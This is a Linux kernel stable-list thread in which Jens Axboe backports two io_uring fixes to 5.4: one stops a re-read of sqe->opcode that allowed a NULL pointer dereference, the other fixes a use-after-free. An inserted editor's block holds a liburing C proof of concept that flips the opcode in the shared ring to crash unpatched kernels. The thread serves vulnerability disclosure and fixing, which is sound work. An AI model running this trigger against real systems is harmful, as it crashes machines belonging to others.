Hi,
Below is an io_uring patch that I'd like to get into 5.4. There's no equivalent 5.5 commit, because the changes needed there to avoid re-reading important sqe fields were a lot more invasive. But the reporter has also tested this one and verified that it fixes his issue. Can we get this queued up for 5.4?
commit 8cfecb9a5d7b2aff34547652adc5bb00a8da5fac
Author: Jens Axboe <axboe@kernel.dk>
Date:   Wed Aug 5 12:30:36 2020 -0600
io_uring: prevent re-read of sqe->opcode
Liu reports that he can trigger a NULL pointer dereference with IORING_OP_SENDMSG, by changing the sqe->opcode after we've validated that the previous opcode didn't need a file and didn't assign one.
Ensure we validate and read the opcode only once.
Reported-by: Liu Yong <pkfxxxing@gmail.com>
Tested-by: Liu Yong <pkfxxxing@gmail.com>
Signed-off-by: Jens Axboe <axboe@kernel.dk>
diff --git a/fs/io_uring.c b/fs/io_uring.c
index e0200406765c..8bb5e19b7c3c 100644
--- a/fs/io_uring.c
+++ b/fs/io_uring.c
@@ -279,6 +279,7 @@ struct sqe_submit {
 	bool				has_user;
 	bool				needs_lock;
 	bool				needs_fixed_file;
+	u8				opcode;
 };
 
 /*
@@ -505,7 +506,7 @@ static inline void io_queue_async_work(struct io_ring_ctx *ctx,
 	int rw = 0;
 
 	if (req->submit.sqe) {
-		switch (req->submit.sqe->opcode) {
+		switch (req->submit.opcode) {
 		case IORING_OP_WRITEV:
 		case IORING_OP_WRITE_FIXED:
 			rw = !(req->rw.ki_flags & IOCB_DIRECT);
@@ -1254,23 +1255,15 @@ static int io_import_fixed(struct io_ring_ctx *ctx, int rw,
 }
 
 static ssize_t io_import_iovec(struct io_ring_ctx *ctx, int rw,
-			       const struct sqe_submit *s, struct iovec **iovec,
+			       struct io_kiocb *req, struct iovec **iovec,
 			       struct iov_iter *iter)
 {
-	const struct io_uring_sqe *sqe = s->sqe;
+	const struct io_uring_sqe *sqe = req->submit.sqe;
 	void __user *buf = u64_to_user_ptr(READ_ONCE(sqe->addr));
 	size_t sqe_len = READ_ONCE(sqe->len);
 	u8 opcode;
 
-	/*
-	 * We're reading ->opcode for the second time, but the first read
-	 * doesn't care whether it's _FIXED or not, so it doesn't matter
-	 * whether ->opcode changes concurrently. The first read does care
-	 * about whether it is a READ or a WRITE, so we don't trust this read
-	 * for that purpose and instead let the caller pass in the read/write
-	 * flag.
-	 */
-	opcode = READ_ONCE(sqe->opcode);
+	opcode = req->submit.opcode;
 	if (opcode == IORING_OP_READ_FIXED ||
 	    opcode == IORING_OP_WRITE_FIXED) {
 		ssize_t ret = io_import_fixed(ctx, rw, sqe, iter);
@@ -1278,7 +1271,7 @@ static ssize_t io_import_iovec(struct io_ring_ctx *ctx, int rw,
 		return ret;
 	}
 
-	if (!s->has_user)
+	if (!req->submit.has_user)
 		return -EFAULT;
 
 #ifdef CONFIG_COMPAT
@@ -1425,7 +1418,7 @@ static int io_read(struct io_kiocb *req, const struct sqe_submit *s,
 	if (unlikely(!(file->f_mode & FMODE_READ)))
 		return -EBADF;
 
-	ret = io_import_iovec(req->ctx, READ, s, &iovec, &iter);
+	ret = io_import_iovec(req->ctx, READ, req, &iovec, &iter);
 	if (ret < 0)
 		return ret;
 
@@ -1490,7 +1483,7 @@ static int io_write(struct io_kiocb *req, const struct sqe_submit *s,
 	if (unlikely(!(file->f_mode & FMODE_WRITE)))
 		return -EBADF;
 
-	ret = io_import_iovec(req->ctx, WRITE, s, &iovec, &iter);
+	ret = io_import_iovec(req->ctx, WRITE, req, &iovec, &iter);
 	if (ret < 0)
 		return ret;
 
@@ -2109,15 +2102,14 @@ static int io_req_defer(struct io_ring_ctx *ctx, struct io_kiocb *req,
 static int __io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req,
 			   const struct sqe_submit *s, bool force_nonblock)
 {
-	int ret, opcode;
+	int ret;
 
 	req->user_data = READ_ONCE(s->sqe->user_data);
 
 	if (unlikely(s->index >= ctx->sq_entries))
 		return -EINVAL;
 
-	opcode = READ_ONCE(s->sqe->opcode);
-	switch (opcode) {
+	switch (req->submit.opcode) {
 	case IORING_OP_NOP:
 		ret = io_nop(req, req->user_data);
 		break;
@@ -2181,10 +2173,10 @@ static int __io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req,
 	return 0;
 }
 
-static struct async_list *io_async_list_from_sqe(struct io_ring_ctx *ctx,
-						 const struct io_uring_sqe *sqe)
+static struct async_list *io_async_list_from_req(struct io_ring_ctx *ctx,
+						 struct io_kiocb *req)
 {
-	switch (sqe->opcode) {
+	switch (req->submit.opcode) {
 	case IORING_OP_READV:
 	case IORING_OP_READ_FIXED:
 		return &ctx->pending_async[READ];
@@ -2196,12 +2188,10 @@ static struct async_list *io_async_list_from_sqe(struct io_ring_ctx *ctx,
 	}
 }
 
-static inline bool io_sqe_needs_user(const struct io_uring_sqe *sqe)
+static inline bool io_req_needs_user(struct io_kiocb *req)
 {
-	u8 opcode = READ_ONCE(sqe->opcode);
-
-	return !(opcode == IORING_OP_READ_FIXED ||
-		 opcode == IORING_OP_WRITE_FIXED);
+	return !(req->submit.opcode == IORING_OP_READ_FIXED ||
+		 req->submit.opcode == IORING_OP_WRITE_FIXED);
 }
 
 static void io_sq_wq_submit_work(struct work_struct *work)
@@ -2217,7 +2207,7 @@ static void io_sq_wq_submit_work(struct work_struct *work)
 	int ret;
 
 	old_cred = override_creds(ctx->creds);
-	async_list = io_async_list_from_sqe(ctx, req->submit.sqe);
+	async_list = io_async_list_from_req(ctx, req);
 
 	allow_kernel_signal(SIGINT);
 restart:
@@ -2239,7 +2229,7 @@ static void io_sq_wq_submit_work(struct work_struct *work)
 		}
 
 		ret = 0;
-		if (io_sqe_needs_user(sqe) && !cur_mm) {
+		if (io_req_needs_user(req) && !cur_mm) {
 			if (!mmget_not_zero(ctx->sqo_mm)) {
 				ret = -EFAULT;
 			} else {
@@ -2387,11 +2377,9 @@ static bool io_add_to_prev_work(struct async_list *list, struct io_kiocb *req)
 	return ret;
 }
 
-static bool io_op_needs_file(const struct io_uring_sqe *sqe)
+static bool io_op_needs_file(struct io_kiocb *req)
 {
-	int op = READ_ONCE(sqe->opcode);
-
-	switch (op) {
+	switch (req->submit.opcode) {
 	case IORING_OP_NOP:
 	case IORING_OP_POLL_REMOVE:
 	case IORING_OP_TIMEOUT:
@@ -2419,7 +2407,7 @@ static int io_req_set_file(struct io_ring_ctx *ctx, const struct sqe_submit *s,
 	 */
 	req->sequence = s->sequence;
 
-	if (!io_op_needs_file(s->sqe))
+	if (!io_op_needs_file(req))
 		return 0;
 
 	if (flags & IOSQE_FIXED_FILE) {
@@ -2460,7 +2448,7 @@ static int __io_queue_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req,
 
 			s->sqe = sqe_copy;
 			memcpy(&req->submit, s, sizeof(*s));
-			list = io_async_list_from_sqe(ctx, s->sqe);
+			list = io_async_list_from_req(ctx, req);
 			if (!io_add_to_prev_work(list, req)) {
 				if (list)
 					atomic_inc(&list->cnt);
@@ -2582,7 +2570,7 @@ static void io_submit_sqe(struct io_ring_ctx *ctx, struct sqe_submit *s,
 	req->user_data = s->sqe->user_data;
 
 #if defined(CONFIG_NET)
-	switch (READ_ONCE(s->sqe->opcode)) {
+	switch (req->submit.opcode) {
 	case IORING_OP_SENDMSG:
 	case IORING_OP_RECVMSG:
 		spin_lock(&current->fs->lock);
@@ -2697,6 +2685,7 @@ static bool io_get_sqring(struct io_ring_ctx *ctx, struct sqe_submit *s)
 	if (head < ctx->sq_entries) {
 		s->index = head;
 		s->sqe = &ctx->sq_sqes[head];
+		s->opcode = READ_ONCE(s->sqe->opcode);
 		s->sequence = ctx->cached_sq_head;
 		ctx->cached_sq_head++;
 		return true;
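[Editor's illustration, not part of the patch or thread, and not Liu Yong's actual reproducer: the race described in the commit message amounts to one thread flipping the opcode byte in the shared SQ ring while another thread submits. A rough liburing-based sketch of that idea, assuming an unpatched 5.4 kernel, might look like the following; build it as something like "cc race.c -o race -luring -lpthread" (file name hypothetical).]

/*
 * Hypothetical sketch: flip the opcode of a shared SQE between NOP
 * (needs no file) and SENDMSG (needs req->file) while submitting,
 * hoping to land the flip between the kernel's two reads of
 * sqe->opcode on an unpatched 5.4 kernel.
 */
#include <liburing.h>
#include <pthread.h>

static struct io_uring ring;
static volatile unsigned char *opcode_ptr;

static void *flipper(void *arg)
{
	(void)arg;
	/* Hammer the opcode byte that lives in the shared SQ ring mmap. */
	for (;;) {
		*opcode_ptr = IORING_OP_SENDMSG;	/* needs req->file */
		*opcode_ptr = IORING_OP_NOP;		/* needs no file */
	}
	return NULL;
}

int main(void)
{
	pthread_t thr;
	struct io_uring_sqe *sqe;

	/* One SQ entry, so every submission reuses the same SQE slot. */
	if (io_uring_queue_init(1, &ring, 0) < 0)
		return 1;

	sqe = io_uring_get_sqe(&ring);
	io_uring_prep_nop(sqe);			/* prep_nop sets fd = -1 */
	opcode_ptr = &sqe->opcode;

	pthread_create(&thr, NULL, flipper, NULL);

	/*
	 * Each io_uring_submit() makes the kernel read the SQE. If the
	 * opcode flips from NOP to SENDMSG between the "needs a file?"
	 * check and the opcode switch, an unpatched 5.4 kernel calls
	 * io_sendmsg() with req->file == NULL.
	 */
	for (;;) {
		io_uring_submit(&ring);
		sqe = io_uring_get_sqe(&ring);
		if (!sqe)
			continue;
		io_uring_prep_nop(sqe);
	}
}

[With the patch applied, the flip is harmless: the opcode is latched once in io_get_sqring(), so a late change to SENDMSG is never seen after the file check, and a latched SENDMSG with fd == -1 simply fails with -EBADF.]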
On 8/5/20 12:34 PM, Jens Axboe wrote:
> Hi,
>
> Below is an io_uring patch that I'd like to get into 5.4. There's no equivalent 5.5 commit, because the changes needed there to avoid re-reading important sqe fields were a lot more invasive. But the reporter has also tested this one and verified that it fixes his issue. Can we get this queued up for 5.4?
And on top of that, this one as well, which is also only applicable to 5.4. Thanks!
commit 33757992d5627b986757fd70ff86d73f2bda0dac
Author: Guoyu Huang <hgy5945@gmail.com>
Date:   Tue Aug 4 20:40:42 2020 -0700
io_uring: Fix use-after-free in io_sq_wq_submit_work()
When ctx->sqo_mm is zero, io_sq_wq_submit_work() frees 'req' without deleting it from 'task_list'. After that, 'req' is accessed in io_ring_ctx_wait_and_kill(), which leads to a use-after-free.
Signed-off-by: Guoyu Huang <hgy5945@gmail.com>
Signed-off-by: Jens Axboe <axboe@kernel.dk>
diff --git a/fs/io_uring.c b/fs/io_uring.c
index 8bb5e19b7c3c..be3d595a607f 100644
--- a/fs/io_uring.c
+++ b/fs/io_uring.c
@@ -2232,6 +2232,7 @@ static void io_sq_wq_submit_work(struct work_struct *work)
 		if (io_req_needs_user(req) && !cur_mm) {
 			if (!mmget_not_zero(ctx->sqo_mm)) {
 				ret = -EFAULT;
+				goto end_req;
 			} else {
 				cur_mm = ctx->sqo_mm;
 				use_mm(cur_mm);
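[Editor's illustration, not the io_uring code and not part of the thread; names are made up. The rule this fix enforces is "unlink before free": an object still linked on a shared list must be removed from that list before it is freed, otherwise a later walker (here io_ring_ctx_wait_and_kill()) dereferences freed memory. A minimal, self-contained C sketch of that rule:]

#include <stdio.h>
#include <stdlib.h>

struct node {
	struct node *next;
	struct node *prev;
	int id;
};

/* Sentinel head of a doubly linked "task_list"-style list. */
static struct node task_list = { &task_list, &task_list, 0 };

static void list_add(struct node *n)
{
	n->next = task_list.next;
	n->prev = &task_list;
	task_list.next->prev = n;
	task_list.next = n;
}

static void list_del(struct node *n)
{
	n->prev->next = n->next;
	n->next->prev = n->prev;
}

static void release(struct node *n, int buggy)
{
	if (!buggy)
		list_del(n);	/* the fixed path: unlink before freeing */
	free(n);		/* buggy path frees while still linked */
}

int main(void)
{
	struct node *n = calloc(1, sizeof(*n));

	n->id = 42;
	list_add(n);

	release(n, /*buggy=*/0);	/* pass 1 to reproduce the use-after-free */

	/* Later teardown walks the list, like io_ring_ctx_wait_and_kill(). */
	for (struct node *p = task_list.next; p != &task_list; p = p->next)
		printf("still queued: %d\n", p->id);	/* touches freed memory if buggy */

	return 0;
}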
On Wed, Aug 05, 2020 at 01:10:25PM -0600, Jens Axboe wrote:
> On 8/5/20 12:34 PM, Jens Axboe wrote:
>> Hi,
>>
>> Below is an io_uring patch that I'd like to get into 5.4. There's no equivalent 5.5 commit, because the changes needed there to avoid re-reading important sqe fields were a lot more invasive. But the reporter has also tested this one and verified that it fixes his issue. Can we get this queued up for 5.4?
>
> And on top of that, this one as well, which is also only applicable to 5.4. Thanks!
Also queued up, thanks!
greg k-h
On 8/7/20 7:19 AM, Greg KH wrote:
> On Wed, Aug 05, 2020 at 01:10:25PM -0600, Jens Axboe wrote:
>> On 8/5/20 12:34 PM, Jens Axboe wrote:
>>> Hi,
>>>
>>> Below is an io_uring patch that I'd like to get into 5.4. There's no equivalent 5.5 commit, because the changes needed there to avoid re-reading important sqe fields were a lot more invasive. But the reporter has also tested this one and verified that it fixes his issue. Can we get this queued up for 5.4?
>>
>> And on top of that, this one as well, which is also only applicable to 5.4. Thanks!
>
> Also queued up, thanks!
Thanks for both!
On Wed, Aug 05, 2020 at 12:34:09PM -0600, Jens Axboe wrote:
> Hi,
>
> Below is an io_uring patch that I'd like to get into 5.4. There's no equivalent 5.5 commit, because the changes needed there to avoid re-reading important sqe fields were a lot more invasive. But the reporter has also tested this one and verified that it fixes his issue. Can we get this queued up for 5.4?
>
> commit 8cfecb9a5d7b2aff34547652adc5bb00a8da5fac
> Author: Jens Axboe <axboe@kernel.dk>
> Date:   Wed Aug 5 12:30:36 2020 -0600
>
> io_uring: prevent re-read of sqe->opcode
>
> Liu reports that he can trigger a NULL pointer dereference with IORING_OP_SENDMSG, by changing the sqe->opcode after we've validated that the previous opcode didn't need a file and didn't assign one.
>
> Ensure we validate and read the opcode only once.
>
> Reported-by: Liu Yong <pkfxxxing@gmail.com>
> Tested-by: Liu Yong <pkfxxxing@gmail.com>
> Signed-off-by: Jens Axboe <axboe@kernel.dk>
Now queued up, thanks!
greg k-h